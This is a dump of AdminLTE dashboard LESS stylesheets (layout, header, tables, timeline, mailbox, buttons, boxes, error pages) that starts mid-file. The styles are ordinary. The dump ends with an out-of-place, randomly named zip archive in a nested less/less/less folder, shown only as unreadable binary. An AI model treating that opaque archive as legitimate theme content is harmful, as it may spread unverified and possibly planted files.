  padding: 15px;
  color: #444;
  border-top: 1px solid @gray;
}

/* Fixed layout */
.fixed {
  .main-header,
  .main-sidebar,
  .left-side {
    position: fixed;
  }
  .main-header {
    top: 0;
    right: 0;
    left: 0;
  }
  .content-wrapper,
  .right-side {
    padding-top: 50px;
    @media (max-width: @screen-header-collapse) {
      padding-top: 100px;
    }
  }
  &.layout-boxed {
    .wrapper {
      max-width: 100%;
    }
  }
}

body.hold-transition {
  .content-wrapper,
  .right-side,
  .main-footer,
  .main-sidebar,
  .left-side,
  .main-header > .navbar,
  .main-header .logo {
    /* Fix for IE */
    .transition(none);
  }
}

/* Content */
.content {
  min-height: 250px;
  padding: 15px;
  .container-fixed(@grid-gutter-width);
}

/* H1 - H6 font */
h1,
h2,
h3,
h4,
h5,
h6,
.h1,
.h2,
.h3,
.h4,
.h5,
.h6 {
  font-family: 'Source Sans Pro', sans-serif;
}

/* General Links */
a {
  color: @link-color;
}

a:hover,
a:active,
a:focus {
  outline: none;
  text-decoration: none;
  color: @link-hover-color;
}

/* Page Header */
.page-header {
  margin: 10px 0 20px 0;
  font-size: 22px;

  > small {
    color: #666;
    display: block;
    margin-top: 5px;
  }
}
less/header.less000066400000011277152434265230007652 0ustar00/*
 * Component: Main Header
 * ----------------------
 */

.main-header {
  position: relative;
  max-height: 100px;
  z-index: 1030;
  //Navbar
  > .navbar {
    .transition(margin-left @transition-speed @transition-fn);
    margin-bottom: 0;
    margin-left: @sidebar-width;
    border: none;
    min-height: @navbar-height;
    border-radius: 0;
    .layout-top-nav & {
      margin-left: 0;
    }
  }
  //Navbar search text input
  #navbar-search-input.form-control {
    background: rgba(255, 255, 255, .2);
    border-color: transparent;
    &:focus,
    &:active {
      border-color: rgba(0, 0, 0, .1);
      background: rgba(255, 255, 255, .9);
    }
    &::-moz-placeholder {
      color: #ccc;
      opacity: 1;
    }
    &:-ms-input-placeholder {
      color: #ccc;
    }
    &::-webkit-input-placeholder {
      color: #ccc;
    }
  }
  //Navbar Right Menu
  .navbar-custom-menu,
  .navbar-right {
    float: right;
    @media (max-width: @screen-sm-max) {
      a {
        color: inherit;
        background: transparent;
      }
    }
  }
  .navbar-right {
    @media (max-width: @screen-header-collapse) {
      float: none;
      .navbar-collapse & {
        margin: 7.5px -15px;
      }

      > li {
        color: inherit;
        border: 0;
      }
    }
  }
  //Navbar toggle button
  .sidebar-toggle {
    float: left;
    background-color: transparent;
    background-image: none;
    padding: @navbar-padding-vertical @navbar-padding-horizontal;
    //Add the fontawesome bars icon
    font-family: fontAwesome;
    &:before {
      content: "\f0c9";
    }
    &:hover {
      color: #fff;
    }
    &:focus,
    &:active {
      background: transparent;
    }
  }
  .sidebar-toggle .icon-bar {
    display: none;
  }
  //Navbar User Menu
  .navbar .nav > li.user > a {
    > .fa,
    > .glyphicon,
    > .ion {
      margin-right: 5px;
    }
  }

  //Labels in navbar
  .navbar .nav > li > a > .label {
    position: absolute;
    top: 9px;
    right: 7px;
    text-align: center;
    font-size: 9px;
    padding: 2px 3px;
    line-height: .9;
  }

  //Logo bar
  .logo {
    .transition(width @transition-speed @transition-fn);
    display: block;
    float: left;
    height: @navbar-height;
    font-size: 20px;
    line-height: 50px;
    text-align: center;
    width: @sidebar-width;
    font-family: "Helvetica Neue", Helvetica, Arial, sans-serif;
    padding: 0 15px;
    font-weight: 300;
    overflow: hidden;
    //Add support to sidebar mini by allowing the user to create
    //2 logo designs. mini and lg
    .logo-lg {
      //should be visibile when sidebar isn't collapsed
      display: block;
    }
    .logo-mini {
      display: none;
    }
  }
  //Navbar Brand. Alternative logo with layout-top-nav
  .navbar-brand {
    color: #fff;
  }
}

// Content Header
.content-header {
  position: relative;
  padding: 15px 15px 0 15px;
  // Header Text
  > h1 {
    margin: 0;
    font-size: 24px;
    > small {
      font-size: 15px;
      display: inline-block;
      padding-left: 4px;
      font-weight: 300;
    }
  }

  > .breadcrumb {
    float: right;
    background: transparent;
    margin-top: 0;
    margin-bottom: 0;
    font-size: 12px;
    padding: 7px 5px;
    position: absolute;
    top: 15px;
    right: 10px;
    .border-radius(2px);
    > li > a {
      color: #444;
      text-decoration: none;
      display: inline-block;
      > .fa, > .glyphicon, > .ion {
        margin-right: 5px;
      }
    }
    > li + li:before {
      content: '>\00a0';
    }
  }

  @media (max-width: @screen-sm-max) {
    > .breadcrumb {
      position: relative;
      margin-top: 5px;
      top: 0;
      right: 0;
      float: none;
      background: @gray;
      padding-left: 10px;
      li:before {
        color: darken(@gray, 20%);
      }
    }
  }
}

.navbar-toggle {
  color: #fff;
  border: 0;
  margin: 0;
  padding: @navbar-padding-vertical @navbar-padding-horizontal;
}

//Control navbar scaffolding on x-small screens
@media (max-width: @screen-sm-max) {
  .navbar-custom-menu .navbar-nav > li {
    float: left;
  }

  //Dont't let links get full width
  .navbar-custom-menu .navbar-nav {
    margin: 0;
    float: left;
  }

  .navbar-custom-menu .navbar-nav > li > a {
    padding-top: 15px;
    padding-bottom: 15px;
    line-height: 20px;
  }
}

// Collapse header
@media (max-width: @screen-header-collapse) {
  .main-header {
    position: relative;
    .logo,
    .navbar {
      width: 100%;
      float: none;
    }
    .navbar {
      margin: 0;
    }
    .navbar-custom-menu {
      float: right;
    }
  }
}

.navbar-collapse.pull-left {
  @media (max-width: @screen-sm-max) {
    float: none !important;
    + .navbar-custom-menu {
      display: block;
      position: absolute;
      top: 0;
      right: 40px;
    }
  }
}
less/table.less000066400000001601152434265230007477 0ustar00/*
 * Component: Table
 * ----------------
 */

.table {
  //Cells
  > thead,
  > tbody,
  > tfoot {
    > tr {
      > th,
      > td {
        border-top: 1px solid @box-border-color;
      }
    }
  }
  //thead cells
  > thead > tr > th {
    border-bottom: 2px solid @box-border-color;
  }
  //progress bars in tables
  tr td .progress {
    margin-top: 5px;
  }
}

//Bordered Table
.table-bordered {
  border: 1px solid @box-border-color;
  > thead,
  > tbody,
  > tfoot {
    > tr {
      > th,
      > td {
        border: 1px solid @box-border-color;
      }
    }
  }
  > thead > tr {
    > th,
    > td {
      border-bottom-width: 2px;
    }
  }
}

.table.no-border {
  &,
  td,
  th {
    border: 0;
  }
}

/* .text-center in tables */
table.text-center {
  &, td, th {
    text-align: center;
  }
}

.table.align {
  th {
    text-align: left;
  }
  td {
    text-align: right;
  }
}
less/timeline.less000066400000003633152434265230010225 0ustar00/*
 * Component: Timeline
 * -------------------
 */

.timeline {
  position: relative;
  margin: 0 0 30px 0;
  padding: 0;
  list-style: none;

  // The line
  &:before {
    content: '';
    position: absolute;
    top: 0;
    bottom: 0;
    width: 4px;
    background: #ddd;
    left: 31px;
    margin: 0;
    .border-radius(2px);
  }

  > li {
    position: relative;
    margin-right: 10px;
    margin-bottom: 15px;
    .clearfix();

    // The content
    > .timeline-item {
      .box-shadow(@box-boxshadow);
      .border-radius(@box-border-radius);
      margin-top: 0;
      background: #fff;
      color: #444;
      margin-left: 60px;
      margin-right: 15px;
      padding: 0;
      position: relative;

      // The time and header
      > .time {
        color: #999;
        float: right;
        padding: 10px;
        font-size: 12px;
      }
      > .timeline-header {
        margin: 0;
        color: #555;
        border-bottom: 1px solid @box-border-color;
        padding: 10px;
        font-size: 16px;
        line-height: 1.1;
        > a {
          font-weight: 600;
        }
      }
      // Item body and footer
      > .timeline-body, > .timeline-footer {
        padding: 10px;
      }

    }

    // The icons
    > .fa,
    > .glyphicon,
    > .ion {
      width: 30px;
      height: 30px;
      font-size: 15px;
      line-height: 30px;
      position: absolute;
      color: #666;
      background: @gray;
      border-radius: 50%;
      text-align: center;
      left: 18px;
      top: 0;
    }
  }

  // Time label
  > .time-label {
    > span {
      font-weight: 600;
      padding: 5px;
      display: inline-block;
      background-color: #fff;

      .border-radius(4px);
    }
  }
}

.timeline-inverse {
  > li {
    > .timeline-item {
      background: #f0f0f0;
      border: 1px solid #ddd;
      .box-shadow(none);
      > .timeline-header {
        border-bottom-color: #ddd;
      }
    }
  }
}
less/mailbox.less000066400000002305152434265230010045 0ustar00/*
 * Page: Mailbox
 * -------------
 */
.mailbox-messages {
  > .table {
    margin: 0;
  }
}

.mailbox-controls {
  padding: 5px;
  &.with-border {
    border-bottom: 1px solid @box-border-color;
  }
}

.mailbox-read-info {
  border-bottom: 1px solid @box-border-color;
  padding: 10px;
  h3 {
    font-size: 20px;
    margin: 0;
  }
  h5 {
    margin: 0;
    padding: 5px 0 0 0;
  }
}

.mailbox-read-time {
  color: #999;
  font-size: 13px;
}

.mailbox-read-message {
  padding: 10px;
}

.mailbox-attachments {
  &:extend(.list-unstyled);
  li {
    float: left;
    width: 200px;
    border: 1px solid #eee;
    margin-bottom: 10px;
    margin-right: 10px;
  }
}

.mailbox-attachment-name {
  font-weight: bold;
  color: #666;
}

.mailbox-attachment-icon,
.mailbox-attachment-info,
.mailbox-attachment-size {
  display: block;
}

.mailbox-attachment-info {
  padding: 10px;
  background: #f4f4f4;
}

.mailbox-attachment-size {
  color: #999;
  font-size: 12px;
}

.mailbox-attachment-icon {
  text-align: center;
  font-size: 65px;
  color: #666;
  padding: 20px 10px;
  &.has-img {
    padding: 0;
    > img {
      max-width: 100%;
      height: auto;
    }
  }
}

.mailbox-attachment-close {
  &:extend(.close);
}
less/mixins.less000066400000015621152434265230007726 0ustar00//AdminLTE mixins
//===============

//Changes the color and the hovering properties of the navbar
.navbar-variant(@color; @font-color: rgba(255, 255, 255, 0.8); @hover-color: #f6f6f6; @hover-bg: rgba(0, 0, 0, 0.1)) {
  background-color: @color;
  //Navbar links
  .nav > li > a {
    color: @font-color;
  }

  .nav > li > a:hover,
  .nav > li > a:active,
  .nav > li > a:focus,
  .nav .open > a,
  .nav .open > a:hover,
  .nav .open > a:focus,
  .nav > .active > a {
    background: @hover-bg;
    color: @hover-color;
  }

  //Add color to the sidebar toggle button
  .sidebar-toggle {
    color: @font-color;
    &:hover {
      color: @hover-color;
      background: @hover-bg;
    }
  }
}

//Logo color variation
.logo-variant(@bg-color; @color: #fff; @border-bottom-color: transparent; @border-bottom-width: 0) {
  background-color: @bg-color;
  color: @color;
  border-bottom: @border-bottom-width solid @border-bottom-color;

  &:hover {
    background-color: darken(@bg-color, 1%);
  }
}

//Box solid color variantion creator
.box-solid-variant(@color; @text-color: #fff) {
  border: 1px solid @color;
  > .box-header {
    color: @text-color;
    background: @color;
    background-color: @color;
    a,
    .btn {
      color: @text-color;
    }
  }
}

//Direct Chat Variant
.direct-chat-variant(@bg-color; @color: #fff) {
  .right > .direct-chat-text {
    background: @bg-color;
    border-color: @bg-color;
    color: @color;
    &:after,
    &:before {
      border-left-color: @bg-color;
    }
  }
}

//border radius creator
.border-radius(@radius) {
  border-radius: @radius;
}

//Different radius each side
.border-radius(@top-left;
@top-right
;
@bottom-left
;
@bottom-right
)
{
  border-top-left-radius: @top-left
;
  border-top-right-radius: @top-right
;
  border-bottom-right-radius: @bottom-right
;
  border-bottom-left-radius: @bottom-left
;
}

//Gradient background
.gradient(@color: #F5F5F5, @start: #EEE, @stop: #FFF) {
  background: @color;
  background: -webkit-gradient(linear,
  left bottom,
  left top,
  color-stop(0, @start),
  color-stop(1, @stop));
  background: -ms-linear-gradient(bottom,
  @start,
  @stop);
  background: -moz-linear-gradient(center bottom,
  @start 0%,
  @stop 100%);
  background: -o-linear-gradient(@stop,
  @start);
  filter: e(%("progid:DXImageTransform.Microsoft.gradient(startColorstr='%d', endColorstr='%d', GradientType=0)",@stop,@start));
}

//Added 2.1.0
//Skins Mixins

//Dark Sidebar Mixin
.skin-dark-sidebar(@link-hover-border-color) {
  // Sidebar background color (Both .wrapper and .left-side are responsible for sidebar bg color)
  .wrapper,
  .main-sidebar,
  .left-side {
    background-color: @sidebar-dark-bg;
  }
  //User Panel (resides in the sidebar)
  .user-panel {
    > .info, > .info > a {
      color: #fff;
    }
  }
  //Sidebar Menu. First level links
  .sidebar-menu > li {
    //Section Headning
    &.header {
      color: lighten(@sidebar-dark-bg, 20%);
      background: darken(@sidebar-dark-bg, 4%);
    }
    //links
    > a {
      border-left: 3px solid transparent;
    }
    //Hover and active states
    &:hover > a, &.active > a {
      color: @sidebar-dark-hover-color;
      background: @sidebar-dark-hover-bg;
      border-left-color: @link-hover-border-color;
    }
    //First Level Submenu
    > .treeview-menu {
      margin: 0 1px;
      background: @sidebar-dark-submenu-bg;
    }
  }
  //All links within the sidebar menu
  .sidebar a {
    color: @sidebar-dark-color;
    &:hover {
      text-decoration: none;
    }
  }
  //All submenus
  .treeview-menu {
    > li {
      > a {
        color: @sidebar-dark-submenu-color;
      }
      &.active > a, > a:hover {
        color: @sidebar-dark-submenu-hover-color;
      }
    }
  }
  //The sidebar search form
  .sidebar-form {
    .border-radius(3px);
    border: 1px solid lighten(@sidebar-dark-bg, 10%);
    margin: 10px 10px;
    input[type="text"], .btn {
      box-shadow: none;
      background-color: lighten(@sidebar-dark-bg, 10%);
      border: 1px solid transparent;
      height: 35px;
      .transition(all @transition-speed @transition-fn);
    }
    input[type="text"] {
      color: #666;
      .border-radius(2px, 0, 2px, 0);
      &:focus, &:focus + .input-group-btn .btn {
        background-color: #fff;
        color: #666;
      }
      &:focus + .input-group-btn .btn {
        border-left-color: #fff;
      }
    }
    .btn {
      color: #999;
      .border-radius(0, 2px, 0, 2px);
    }
  }
}

//Light Sidebar Mixin
.skin-light-sidebar(@icon-active-color) {
  // Sidebar background color (Both .wrapper and .left-side are responsible for sidebar bg color)
  .wrapper,
  .main-sidebar,
  .left-side {
    background-color: @sidebar-light-bg;
  }
  .content-wrapper,
  .main-footer {
    border-left: 1px solid @gray;
  }
  //User Panel (resides in the sidebar)
  .user-panel {
    > .info, > .info > a {
      color: @sidebar-light-color;
    }
  }
  //Sidebar Menu. First level links
  .sidebar-menu > li {
    .transition(border-left-color .3s ease);
    //border-left: 3px solid transparent;
    //Section Headning
    &.header {
      color: lighten(@sidebar-light-color, 25%);
      background: @sidebar-light-bg;
    }
    //links
    > a {
      border-left: 3px solid transparent;
      font-weight: 600;
    }
    //Hover and active states
    &:hover > a,
    &.active > a {
      color: @sidebar-light-hover-color;
      background: @sidebar-light-hover-bg;
    }
    &:hover > a {

    }
    &.active {
      border-left-color: @icon-active-color;
      > a {
        font-weight: 600;
      }
    }
    //First Level Submenu
    > .treeview-menu {
      background: @sidebar-light-submenu-bg;
    }
  }
  //All links within the sidebar menu
  .sidebar a {
    color: @sidebar-light-color;
    &:hover {
      text-decoration: none;
    }
  }
  //All submenus
  .treeview-menu {
    > li {
      > a {
        color: @sidebar-light-submenu-color;
      }
      &.active > a,
      > a:hover {
        color: @sidebar-light-submenu-hover-color;
      }
      &.active > a {
        font-weight: 600;
      }
    }
  }
  //The sidebar search form
  .sidebar-form {
    .border-radius(3px);
    border: 1px solid @gray; //darken(@sidebar-light-bg, 5%);
    margin: 10px 10px;
    input[type="text"],
    .btn {
      box-shadow: none;
      background-color: #fff; //darken(@sidebar-light-bg, 3%);
      border: 1px solid transparent;
      height: 35px;
      .transition(all @transition-speed @transition-fn);
    }
    input[type="text"] {
      color: #666;
      .border-radius(2px, 0, 2px, 0);
      &:focus,
      &:focus + .input-group-btn .btn {
        background-color: #fff;
        color: #666;
      }
      &:focus + .input-group-btn .btn {
        border-left-color: #fff;
      }
    }
    .btn {
      color: #999;
      .border-radius(0, 2px, 0, 2px);
    }
  }
  @media (min-width: @screen-sm-min) {
    &.sidebar-mini.sidebar-collapse {
      .sidebar-menu > li > .treeview-menu {
        border-left: 1px solid @gray;
      }
    }
  }
}
less/fullcalendar.less000066400000002770152434265230011054 0ustar00/*
 * Plugin: Full Calendar
 * ---------------------
 */
//Fullcalendar buttons
.fc-button {
  background: #f4f4f4;
  background-image: none;
  color: #444;
  border-color: #ddd;
  border-bottom-color: #ddd;
  &:hover,
  &:active,
  &.hover {
    background-color: #e9e9e9;
  }
}

// Calendar title
.fc-header-title h2 {
  font-size: 15px;
  line-height: 1.6em;
  color: #666;
  margin-left: 10px;
}

.fc-header-right {
  padding-right: 10px;
}

.fc-header-left {
  padding-left: 10px;
}

// Calendar table header cells
.fc-widget-header {
  background: #fafafa;
}

.fc-grid {
  width: 100%;
  border: 0;
}

.fc-widget-header:first-of-type,
.fc-widget-content:first-of-type {
  border-left: 0;
  border-right: 0;
}

.fc-widget-header:last-of-type,
.fc-widget-content:last-of-type {
  border-right: 0;
}

.fc-toolbar {
  padding: @box-padding;
  margin: 0;
}

.fc-day-number {
  font-size: 20px;
  font-weight: 300;
  padding-right: 10px;
}

.fc-color-picker {
  list-style: none;
  margin: 0;
  padding: 0;
  > li {
    float: left;
    font-size: 30px;
    margin-right: 5px;
    line-height: 30px;
    .fa {
      .transition-transform(linear .3s);
      &:hover {
        .rotate(30deg);
      }
    }
  }
}

#add-new-event {
  .transition(all linear .3s);
}

.external-event {
  padding: 5px 10px;
  font-weight: bold;
  margin-bottom: 4px;
  box-shadow: @box-boxshadow;
  text-shadow: @box-boxshadow;
  border-radius: @box-border-radius;
  cursor: move;
  &:hover {
    box-shadow: inset 0 0 90px rgba(0, 0, 0, 0.2);
  }
}
less/profile.less000066400000000674152434265230010061 0ustar00/*
 * Page: Profile
 * -------------
 */

.profile-user-img {
  margin: 0 auto;
  width: 100px;
  padding: 3px;
  border: 3px solid @gray;
}

.profile-username {
  font-size: 21px;
  margin-top: 5px;
}

.post {
  border-bottom: 1px solid @gray;
  margin-bottom: 15px;
  padding-bottom: 15px;
  color: #666;
  &:last-of-type {
    border-bottom: 0;
    margin-bottom: 0;
    padding-bottom: 0;
  }
  .user-block {
    margin-bottom: 15px;
  }
}
less/buttons.less000066400000006074152434265230010117 0ustar00/*
 * Component: Button
 * -----------------
 */

.btn {
  .border-radius(@btn-border-radius);
  .box-shadow(@btn-boxshadow);
  border: 1px solid transparent;

  &.uppercase {
    text-transform: uppercase
  }

  // Flat buttons
  &.btn-flat {
    .border-radius(0);
    -webkit-box-shadow: none;
    -moz-box-shadow: none;
    box-shadow: none;
    border-width: 1px;
  }

  // Active state
  &:active {
    -webkit-box-shadow: inset 0 3px 5px rgba(0, 0, 0, .125);
    -moz-box-shadow: inset 0 3px 5px rgba(0, 0, 0, .125);
    box-shadow: inset 0 3px 5px rgba(0, 0, 0, .125);
  }

  &:focus {
    outline: none;
  }

  // input file btn
  &.btn-file {
    position: relative;
    overflow: hidden;
    > input[type='file'] {
      position: absolute;
      top: 0;
      right: 0;
      min-width: 100%;
      min-height: 100%;
      font-size: 100px;
      text-align: right;
      .opacity(0);
      outline: none;
      background: white;
      cursor: inherit;
      display: block;
    }
  }
}

//Button color variations
.btn-default {
  background-color: #f4f4f4;
  color: #444;
  border-color: #ddd;
  &:hover,
  &:active,
  &.hover {
    background-color: darken(#f4f4f4, 5%);
  }
}

.btn-primary {
  background-color: @light-blue;
  border-color: darken(@light-blue, 5%);
  &:hover, &:active, &.hover {
    background-color: darken(@light-blue, 5%);
  }
}

.btn-success {
  background-color: @green;
  border-color: darken(@green, 5%);
  &:hover, &:active, &.hover {
    background-color: darken(@green, 5%);
  }
}

.btn-info {
  background-color: @aqua;
  border-color: darken(@aqua, 5%);
  &:hover, &:active, &.hover {
    background-color: darken(@aqua, 5%);
  }
}

.btn-danger {
  background-color: @red;
  border-color: darken(@red, 5%);
  &:hover, &:active, &.hover {
    background-color: darken(@red, 5%);
  }
}

.btn-warning {
  background-color: @yellow;
  border-color: darken(@yellow, 5%);
  &:hover, &:active, &.hover {
    background-color: darken(@yellow, 5%);
  }
}

.btn-outline {
  border: 1px solid #fff;
  background: transparent;
  color: #fff;
  &:hover,
  &:focus,
  &:active {
    color: rgba(255, 255, 255, .7);
    border-color: rgba(255, 255, 255, .7);
  }
}

.btn-link {
  .box-shadow(none);
}

//General .btn with bg class
.btn[class*='bg-']:hover {
  .box-shadow(inset 0 0 100px rgba(0, 0, 0, 0.2));
}

// Application buttons
.btn-app {
  .border-radius(3px);
  position: relative;
  padding: 15px 5px;
  margin: 0 0 10px 10px;
  min-width: 80px;
  height: 60px;
  text-align: center;
  color: #666;
  border: 1px solid #ddd;
  background-color: #f4f4f4;
  font-size: 12px;
  //Icons within the btn
  > .fa, > .glyphicon, > .ion {
    font-size: 20px;
    display: block;
  }

  &:hover {
    background: #f4f4f4;
    color: #444;
    border-color: #aaa;
  }

  &:active, &:focus {
    -webkit-box-shadow: inset 0 3px 5px rgba(0, 0, 0, .125);
    -moz-box-shadow: inset 0 3px 5px rgba(0, 0, 0, .125);
    box-shadow: inset 0 3px 5px rgba(0, 0, 0, .125);
  }

  //The badge
  > .badge {
    position: absolute;
    top: -3px;
    right: -10px;
    font-size: 10px;
    font-weight: 400;
  }
}
less/boxes.less000066400000017540152434265230007541 0ustar00/*
 * Component: Box
 * --------------
 */
.box {
  position: relative;
  .border-radius(@box-border-radius);
  background: #ffffff;
  border-top: 3px solid @box-default-border-top-color;
  margin-bottom: 20px;
  width: 100%;
  box-shadow: @box-boxshadow;

  // Box color variations
  &.box-primary {
    border-top-color: @light-blue;
  }
  &.box-info {
    border-top-color: @aqua;
  }
  &.box-danger {
    border-top-color: @red;
  }
  &.box-warning {
    border-top-color: @yellow;
  }
  &.box-success {
    border-top-color: @green;
  }
  &.box-default {
    border-top-color: @gray;
  }

  // collapsed mode
  &.collapsed-box {
    .box-body,
    .box-footer {
      display: none;
    }
  }

  .nav-stacked {
    > li {
      border-bottom: 1px solid @box-border-color;
      margin: 0;
      &:last-of-type {
        border-bottom: none;
      }
    }
  }

  // fixed height to 300px
  &.height-control {
    .box-body {
      max-height: 300px;
      overflow: auto;
    }
  }

  .border-right {
    border-right: 1px solid @box-border-color;
  }
  .border-left {
    border-left: 1px solid @box-border-color;
  }

  //SOLID BOX
  //---------
  //use this class to get a colored header and borders

  &.box-solid {
    border-top: 0;
    > .box-header {
      .btn.btn-default {
        background: transparent;
      }
      .btn,
      a {
        &:hover {
          background: rgba(0, 0, 0, 0.1);
        }
      }
    }

    // Box color variations
    &.box-default {
      .box-solid-variant(@gray, #444);
    }
    &.box-primary {
      .box-solid-variant(@light-blue);
    }
    &.box-info {
      .box-solid-variant(@aqua);
    }
    &.box-danger {
      .box-solid-variant(@red);
    }
    &.box-warning {
      .box-solid-variant(@yellow);
    }
    &.box-success {
      .box-solid-variant(@green);
    }

    > .box-header > .box-tools .btn {
      border: 0;
      box-shadow: none;
    }

    // Fix font color for tiles
    &[class*='bg'] {
      > .box-header {
        color: #fff;
      }
    }

  }

  //BOX GROUP
  .box-group {
    > .box {
      margin-bottom: 5px;
    }
  }

  // jQuery Knob in a box
  .knob-label {
    text-align: center;
    color: #333;
    font-weight: 100;
    font-size: 12px;
    margin-bottom: 0.3em;
  }
}

.box,
.overlay-wrapper {
  // Box overlay for LOADING STATE effect
  > .overlay,
  > .loading-img {
    position: absolute;
    top: 0;
    left: 0;
    width: 100%;
    height: 100%;
  }

  .overlay {
    z-index: 50;
    background: rgba(255, 255, 255, 0.7);
    .border-radius(@box-border-radius);
    > .fa {
      position: absolute;
      top: 50%;
      left: 50%;
      margin-left: -15px;
      margin-top: -15px;
      color: #000;
      font-size: 30px;
    }
  }

  .overlay.dark {
    background: rgba(0, 0, 0, 0.5);
  }
}

//Add clearfix to header, body and footer
.box-header,
.box-body,
.box-footer {
  .clearfix();
}

//Box header
.box-header {
  color: #444;
  display: block;
  padding: @box-padding;
  position: relative;

  //Add bottom border
  &.with-border {
    border-bottom: 1px solid @box-border-color;
    .collapsed-box & {
      border-bottom: none;
    }
  }

  //Icons and box title
  > .fa,
  > .glyphicon,
  > .ion,
  .box-title {
    display: inline-block;
    font-size: 18px;
    margin: 0;
    line-height: 1;
  }
  > .fa,
  > .glyphicon,
  > .ion {
    margin-right: 5px;
  }
  > .box-tools {
    position: absolute;
    right: 10px;
    top: 5px;
    [data-toggle="tooltip"] {
      position: relative;
    }

    &.pull-right {
      .dropdown-menu {
        right: 0;
        left: auto;
      }
    }
  }
}

//Box Tools Buttons
.btn-box-tool {
  padding: 5px;
  font-size: 12px;
  background: transparent;
  color: darken(@box-default-border-top-color, 20%);
  .open &,
  &:hover {
    color: darken(@box-default-border-top-color, 40%);
  }
  &.btn:active {
    box-shadow: none;
  }
}

//Box Body
.box-body {
  .border-radius(0; 0; @box-border-radius; @box-border-radius);
  padding: @box-padding;
  .no-header & {
    .border-top-radius(@box-border-radius);
  }
  // Tables within the box body
  > .table {
    margin-bottom: 0;
  }

  // Calendar within the box body
  .fc {
    margin-top: 5px;
  }

  .full-width-chart {
    margin: -19px;
  }
  &.no-padding .full-width-chart {
    margin: -9px;
  }

  .box-pane {
    .border-radius(0; 0; @box-border-radius; 0);
  }
  .box-pane-right {
    .border-radius(0; 0; 0; @box-border-radius);
  }
}

//Box footer
.box-footer {
  .border-radius(0; 0; @box-border-radius; @box-border-radius);
  border-top: 1px solid @box-border-color;
  padding: @box-padding;
  background-color: @box-footer-bg;
}

.chart-legend {
  &:extend(.list-unstyled);
  margin: 10px 0;
  > li {
    @media (max-width: @screen-sm-max) {
      float: left;
      margin-right: 10px;
    }
  }
}

//Comment Box
.box-comments {
  background: #f7f7f7;
  .box-comment {
    .clearfix();
    padding: 8px 0;
    border-bottom: 1px solid #eee;
    &:last-of-type {
      border-bottom: 0;
    }
    &:first-of-type {
      padding-top: 0;
    }
    img {
      &:extend(.img-sm);
      float: left;
    }
  }
  .comment-text {
    margin-left: 40px;
    color: #555;
  }
  .username {
    color: #444;
    display: block;
    font-weight: 600;
  }
  .text-muted {
    font-weight: 400;
    font-size: 12px;
  }
}

//Widgets
//-----------

/* Widget: TODO LIST */

.todo-list {
  margin: 0;
  padding: 0;
  list-style: none;
  overflow: auto;
  // Todo list element
  > li {
    .border-radius(2px);
    padding: 10px;
    background: #f4f4f4;
    margin-bottom: 2px;
    border-left: 2px solid #e6e7e8;
    color: #444;
    &:last-of-type {
      margin-bottom: 0;
    }

    > input[type='checkbox'] {
      margin: 0 10px 0 5px;
    }

    .text {
      display: inline-block;
      margin-left: 5px;
      font-weight: 600;
    }

    // Time labels
    .label {
      margin-left: 10px;
      font-size: 9px;
    }

    // Tools and options box
    .tools {
      display: none;
      float: right;
      color: @red;
      // icons
      > .fa, > .glyphicon, > .ion {
        margin-right: 5px;
        cursor: pointer;
      }

    }
    &:hover .tools {
      display: inline-block;
    }

    &.done {
      color: #999;
      .text {
        text-decoration: line-through;
        font-weight: 500;
      }

      .label {
        background: @gray !important;
      }
    }
  }

  // Color varaity
  .danger {
    border-left-color: @red;
  }
  .warning {
    border-left-color: @yellow;
  }
  .info {
    border-left-color: @aqua;
  }
  .success {
    border-left-color: @green;
  }
  .primary {
    border-left-color: @light-blue;
  }

  .handle {
    display: inline-block;
    cursor: move;
    margin: 0 5px;
  }

}

// END TODO WIDGET

/* Chat widget (DEPRECATED - this will be removed in the next major release. Use Direct Chat instead)*/
.chat {
  padding: 5px 20px 5px 10px;

  .item {
    .clearfix();
    margin-bottom: 10px;
    // The image
    > img {
      width: 40px;
      height: 40px;
      border: 2px solid transparent;
      .border-radius(50%);
    }

    > .online {
      border: 2px solid @green;
    }
    > .offline {
      border: 2px solid @red;
    }

    // The message body
    > .message {
      margin-left: 55px;
      margin-top: -40px;
      > .name {
        display: block;
        font-weight: 600;
      }
    }

    // The attachment
    > .attachment {
      .border-radius(@attachment-border-radius);
      background: #f4f4f4;
      margin-left: 65px;
      margin-right: 15px;
      padding: 10px;
      > h4 {
        margin: 0 0 5px 0;
        font-weight: 600;
        font-size: 14px;
      }
      > p, > .filename {
        font-weight: 600;
        font-size: 13px;
        font-style: italic;
        margin: 0;

      }
      .clearfix();
    }
  }

}

//END CHAT WIDGET

//Input in box
.box-input {
  max-width: 200px;
}

//A fix for panels body text color when placed within
// a modal
.modal {
  .panel-body {
    color: #444;
  }
}
less/404_500_errors.less000066400000001276152434265230010707 0ustar00/*
 * Page: 400 and 500 error pages
 * ------------------------------
 */
.error-page {
  width: 600px;
  margin: 20px auto 0 auto;
  @media (max-width: @screen-sm-max) {
    width: 100%;
  }
  //For the error number e.g: 404
  > .headline {
    float: left;
    font-size: 100px;
    font-weight: 300;
    @media (max-width: @screen-sm-max) {
      float: none;
      text-align: center;
    }
  }
  //For the message
  > .error-content {
    margin-left: 190px;
    @media (max-width: @screen-sm-max) {
      margin-left: 0;
    }
    > h3 {
      font-weight: 300;
      font-size: 25px;
      @media (max-width: @screen-sm-max) {
        text-align: center;
      }
    }
    display: block;
  }
}
less/less/less/mp4_68edec2326281.zip000064400000012627152434265230012576 0ustar00PK�rN[�MM�rb_68edec2326281.tmp�Uks�H�+S�J
����%�Z�6ƛ�c-�B"D�������������Z�8�}���f���<\���>�#1Sg,xx��!LU�W������Z-�����V�y��$����V�
�N�Bf�Ū��[�*�ǝ��?��s�,�(����㷐`H��Acjtwz�7���3$���3��[�Np8�^Z�$r�y]�A�4]aX��*�)�����_�MtA^�5�̘g�@��W C}�
��p�
f'�a[�z}��T޽�ԃ+�����n��a'ۣM�.�m���v;�w?�.�b�F�>�co���1��������l?�T�u����\���׎�=
�_��K������'�+Rº4����Fw�^!�EZ;���q�*˫���ˏW���e���!A�%
�xy���ߍ?^���WV��(|�{i\�;Pg���8��nRˎ��l	��:�����t��dlNZ��^wRC<-������ 6�H6a��)�E癆,j$�%�r����?=�p^uU>�U�誊ɪ�U�J=Y�Ğx�$�M�J�Q����(����\���S,�©��UL�$B��X�!����h�8�����U)U�� ;���͔�%�_�W�’�T��/����E�i���OҬRf��
��[��Ѣɿ�%k������dHW09P�F�����]WA8��)ۑ��h��F�I&u@���,��I����Ss�#�PU��*�tJ�b��C%浂���Zσ�;�N��S���=������r3[�a�a ��"�#8'��x��
G�łʂ��"�7��0aboC0ˢ3ı�
T|r -��I`��
